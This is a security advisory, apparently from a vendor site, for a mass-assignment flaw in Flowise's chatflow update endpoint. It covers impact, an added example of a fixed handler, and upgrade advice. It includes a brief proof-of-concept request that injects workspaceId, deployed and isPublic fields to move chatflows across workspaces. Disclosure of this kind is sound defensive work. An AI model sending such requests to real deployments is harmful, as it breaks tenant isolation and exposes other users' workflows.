CVE-2026-42863

CVE-2026-42863 is a high-severity security vulnerability in flowise (npm), affecting versions <= 3.1.1. It is fixed in 3.1.2.

Summary

A Mass Assignment vulnerability exists in the chatflow update endpoint of FlowiseAI.

The endpoint allows clients to modify server-controlled properties such as deployed, isPublic, workspaceId, createdDate, and updatedDate when updating a chatflow object.

Due to missing server-side validation and authorization checks, an authenticated user can manipulate internal attributes of a chatflow and reassign it to another workspace. This allows cross-workspace resource reassignment and unauthorized modification of deployment and visibility settings.

Details

The endpoint responsible for updating chatflows:

PUT /api/v1/chatflows/{chatflowId}

accepts a JSON request body containing the chatflow configuration (flowData) along with other metadata fields.

However, the server does not restrict which properties may be modified by the client. As a result, user-controlled request bodies can include additional fields that should normally be controlled only by the backend.

Examples of server-controlled fields that can be manipulated include:

  1. deployed
  2. isPublic
  3. workspaceId
  4. createdDate
  5. updatedDate
  6. category
  7. type

These fields appear to be directly mapped to the underlying database entity when processing the update request, suggesting that the server performs a direct merge of the request body into the chatflow model without applying a strict DTO whitelist or authorization checks.

For example, modifying the request body with:

{
  "deployed": true,
  "isPublic": true,
  "createdDate": "1999-03-06T10:59:32.000Z",
  "updatedDate": "1999-03-06T13:21:34.000Z",
  "workspaceId": "11111111-2222-3333-4444-555555555555"
}

results in the server accepting and persisting these values.

In testing, a second workspace was created in the database and the workspaceId field was successfully modified through the API request. The chatflow was reassigned to the attacker-controlled workspace, confirming that the application does not enforce workspace ownership validation.
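The following is an added illustration, not Flowise code: the unchecked merge pattern the advisory describes beside a hardened update handler that keeps only an allowlist of client-editable fields and refuses writes from outside the owning workspace. Field names come from the advisory; the allowlist (name, flowData), the actor object and the result shape are assumptions.

```javascript
// Added example (not Flowise code). Field names are taken from the advisory;
// the allowlist, actor shape and result shape are assumptions.

// Fields a client may change on PUT /api/v1/chatflows/{id} (assumed allowlist).
const CLIENT_EDITABLE_FIELDS = new Set(['name', 'flowData']);

// Fields the advisory names as server-controlled.
const SERVER_CONTROLLED_FIELDS = ['deployed', 'isPublic', 'workspaceId',
  'createdDate', 'updatedDate', 'category', 'type'];

// Vulnerable pattern: the request body is merged straight into the entity,
// so every server-controlled field present in the body is persisted.
function naiveMerge(existing, body) {
  return { ...existing, ...body };
}

// Hardened pattern: enforce workspace ownership, copy only allowlisted
// fields, and let the server set updatedDate itself. Dropped fields are
// reported so the caller can log the attempt.
function applyChatflowUpdate(existing, body, actor, now = new Date()) {
  if (existing.workspaceId !== actor.workspaceId) {
    return { ok: false, status: 403, error: 'chatflow not in caller workspace' };
  }
  const ignored = Object.keys(body).filter(k => !CLIENT_EDITABLE_FIELDS.has(k));
  const updated = { ...existing };
  for (const key of CLIENT_EDITABLE_FIELDS) {
    if (Object.prototype.hasOwnProperty.call(body, key)) updated[key] = body[key];
  }
  updated.updatedDate = now.toISOString();
  return { ok: true, status: 200, chatflow: updated, ignored };
}

// Constructed sample data mirroring the advisory's request body.
const existingChatflow = {
  id: 'cf-1', name: 'old', flowData: '{}', deployed: false, isPublic: false,
  workspaceId: 'ws-A', createdDate: '2024-01-01T00:00:00.000Z',
  updatedDate: '2024-01-01T00:00:00.000Z',
};
const maliciousBody = {
  name: 'test-flow', flowData: '{...}', deployed: true, isPublic: true,
  createdDate: '1999-03-06T10:59:32.000Z',
  workspaceId: '11111111-2222-3333-4444-555555555555',
};

console.log('naive:', naiveMerge(existingChatflow, maliciousBody).workspaceId);
console.log('hardened:', applyChatflowUpdate(existingChatflow, maliciousBody,
  { workspaceId: 'ws-A' }).ignored);
```

With the naive merge the chatflow moves to the attacker-supplied workspace; with the allowlisted handler only name and flowData change and the four injected fields are reported as ignored.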

PoC

Authenticate to the Flowise interface.

Capture the request used to update a chatflow:

PUT /api/v1/chatflows/<CHATFLOW_ID>
Content-Type: application/json

Modify the request body by injecting additional fields:

{
  "name": "test-flow",
  "flowData": "{...}",
  "deployed": true,
  "isPublic": true,
  "workspaceId": "11111111-2222-3333-4444-555555555555"
}

Send the request.

Observe that the response returns the manipulated values:

{
  "deployed": true,
  "isPublic": true,
  "workspaceId": "11111111-2222-3333-4444-555555555555"
}

Verify in the database that the chatflow has been reassigned:

SELECT id, workspaceId FROM chat_flow WHERE id='<CHATFLOW_ID>';

The workspaceId value reflects the attacker-supplied workspace.

Impact

This vulnerability allows authenticated users to manipulate server-controlled attributes of chatflows.

Confirmed impacts include:

  • Unauthorized modification of chatflow visibility (isPublic)
  • Unauthorized deployment state changes (deployed)
  • Cross-workspace reassignment of chatflows (workspaceId)
  • Unauthorized modification of metadata (createdDate, updatedDate)

In multi-tenant environments, this allows an attacker to move chatflows between workspaces without authorization, breaking tenant isolation boundaries.

This may enable:

  • Cross-workspace workflow takeover
  • Unauthorized exposure of private workflows
  • Manipulation of deployed agent workflows

The issue stems from missing authorization checks and improper handling of client-controlled input in the chatflow update endpoint.

Affected versions

flowise (<= 3.1.1)

Security releases

flowise → 3.1.2 (npm)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.


Remediation advice

Upgrade flowise to 3.1.2 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-42863? CVE-2026-42863 is a high-severity security vulnerability in flowise (npm), affecting versions <= 3.1.1. It is fixed in 3.1.2.
  2. Which versions of flowise are affected by CVE-2026-42863? flowise (npm) versions <= 3.1.1 are affected.
  3. Is there a fix for CVE-2026-42863? Yes. CVE-2026-42863 is fixed in 3.1.2. Upgrade to this version or later.
  4. Is CVE-2026-42863 exploitable, and should I be worried? Whether CVE-2026-42863 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  5. What actually determines whether CVE-2026-42863 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix CVE-2026-42863? Upgrade flowise to 3.1.2 or later.

Other vulnerabilities in flowise

CVE-2026-56268, CVE-2026-46480, CVE-2026-46479, CVE-2026-46478, CVE-2026-46477
